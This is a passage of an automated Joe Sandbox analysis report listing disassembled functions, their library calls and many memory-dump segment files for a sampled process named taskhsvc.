    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002BFAA4, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342
    APIs
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 002E053F: strlen.MSVCRT ref: 002E05C4
      • Part of subcall function 002E053F: abort.MSVCRT ref: 002E094B
      • Part of subcall function 002E053F: abort.MSVCRT ref: 002E0A3E
      • Part of subcall function 002E053F: strcmp.MSVCRT ref: 002E0A56
      • Part of subcall function 002E053F: __stack_chk_fail.LIBSSP-0 ref: 002E0E2A
      • Part of subcall function 0031FB67: abort.MSVCRT ref: 0031FBC3
      • Part of subcall function 0031FB67: abort.MSVCRT ref: 0031FC02
      • Part of subcall function 0031FB67: abort.MSVCRT ref: 0031FC41
      • Part of subcall function 0031FB67: abort.MSVCRT ref: 0031FCEC
      • Part of subcall function 0031FB67: __stack_chk_fail.LIBSSP-0 ref: 0031FD78
      • Part of subcall function 0031FA81: abort.MSVCRT ref: 0031FAD7
      • Part of subcall function 0031FA81: abort.MSVCRT ref: 0031FB16
      • Part of subcall function 0031FA81: __stack_chk_fail.LIBSSP-0 ref: 0031FB60
    • free.MSVCRT ref: 002BFC97
      • Part of subcall function 0031A905: abort.MSVCRT ref: 0031A95C
      • Part of subcall function 0031A905: abort.MSVCRT ref: 0031A99A
      • Part of subcall function 0031A905: abort.MSVCRT ref: 0031A9DE
      • Part of subcall function 0031A905: __stack_chk_fail.LIBSSP-0 ref: 0031AA35
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C166E
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C1698
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C16DA
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C1731
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C178E
      • Part of subcall function 002C13B7: __stack_chk_fail.LIBSSP-0 ref: 002C17A8
    • free.MSVCRT ref: 002BFE2B
      • Part of subcall function 0031FF4B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,002BFE7E), ref: 00320007
      • Part of subcall function 0031FF4B: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,002BFE7E), ref: 0032002B
      • Part of subcall function 0031FF4B: __stack_chk_fail.LIBSSP-0 ref: 00320045
    • __stack_chk_fail.LIBSSP-0 ref: 002BFFCF
      • Part of subcall function 002B3F06: abort.MSVCRT ref: 002B3F62
      • Part of subcall function 002B3F06: __stack_chk_fail.LIBSSP-0 ref: 002B3F72
      • Part of subcall function 0031FA42: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002BFBC0), ref: 0031FA7A
      • Part of subcall function 002B2B73: __stack_chk_fail.LIBSSP-0 ref: 002B2C58
      • Part of subcall function 0033479D: __stack_chk_fail.LIBSSP-0 ref: 0033481C
      • Part of subcall function 002BEC52: __stack_chk_fail.LIBSSP-0 ref: 002BEC82
    • free.MSVCRT ref: 002BFF60
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 002BFFD6: strerror.MSVCRT ref: 002C005A
      • Part of subcall function 002BFFD6: strerror.MSVCRT ref: 002C026C
      • Part of subcall function 002BFFD6: __stack_chk_fail.LIBSSP-0 ref: 002C0321
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002E689C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121
    APIs
      • Part of subcall function 002E3AE2: abort.MSVCRT ref: 002E3B68
      • Part of subcall function 002E3AE2: abort.MSVCRT ref: 002E3BBD
      • Part of subcall function 002E3AE2: __stack_chk_fail.LIBSSP-0 ref: 002E3BD0
    • __stack_chk_fail.LIBSSP-0 ref: 002E6A44
      • Part of subcall function 002E566D: abort.MSVCRT ref: 002E56DD
      • Part of subcall function 002E566D: abort.MSVCRT ref: 002E572A
      • Part of subcall function 002E566D: abort.MSVCRT ref: 002E577F
      • Part of subcall function 002E566D: free.MSVCRT ref: 002E5D20
      • Part of subcall function 002E566D: free.MSVCRT ref: 002E5D42
      • Part of subcall function 002E566D: __stack_chk_fail.LIBSSP-0 ref: 002E5E18
    • free.MSVCRT ref: 002E69C6
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 002E69FE
      • Part of subcall function 002E40B6: free.MSVCRT ref: 002E40F9
      • Part of subcall function 002E40B6: free.MSVCRT ref: 002E4122
      • Part of subcall function 002E40B6: free.MSVCRT ref: 002E4145
      • Part of subcall function 002E40B6: __stack_chk_fail.LIBSSP-0 ref: 002E4167
      • Part of subcall function 002E5E1F: abort.MSVCRT ref: 002E5EB5
      • Part of subcall function 002E5E1F: abort.MSVCRT ref: 002E5F0A
      • Part of subcall function 002E5E1F: strcmp.MSVCRT ref: 002E5F50
      • Part of subcall function 002E5E1F: free.MSVCRT ref: 002E5F72
      • Part of subcall function 002E5E1F: __stack_chk_fail.LIBSSP-0 ref: 002E6077
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002E6A4B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94
    APIs
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 002E6AAF
    • abort.MSVCRT ref: 002E6B04
    • __stack_chk_fail.LIBSSP-0 ref: 002E6B81
      • Part of subcall function 002E62A9: abort.MSVCRT ref: 002E6320
      • Part of subcall function 002E62A9: abort.MSVCRT ref: 002E6375
      • Part of subcall function 002E62A9: free.MSVCRT ref: 002E6448
      • Part of subcall function 002E62A9: __stack_chk_fail.LIBSSP-0 ref: 002E646D
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001E34DB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69
    APIs
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • abort.MSVCRT ref: 001E35A1
    • memset.MSVCRT ref: 001E35BC
    • __stack_chk_fail.LIBSSP-0 ref: 001E35CF
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00287767, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
    APIs
    • abort.MSVCRT ref: 002877D7
      • Part of subcall function 003EC2B0: abort.MSVCRT ref: 003EC2FD
      • Part of subcall function 003EC2B0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1AEF), ref: 003EC312
    • event_new.LIBEVENT-2-0-5 ref: 00287805
    • __stack_chk_fail.LIBSSP-0 ref: 00287861
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 00287850
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855138358.00267000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00321282, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51
    APIs
    • abort.MSVCRT ref: 003212DB
    • realloc.MSVCRT ref: 003212FA
    • __stack_chk_fail.LIBSSP-0 ref: 0032134E
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • exit.MSVCRT ref: 0032133B
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
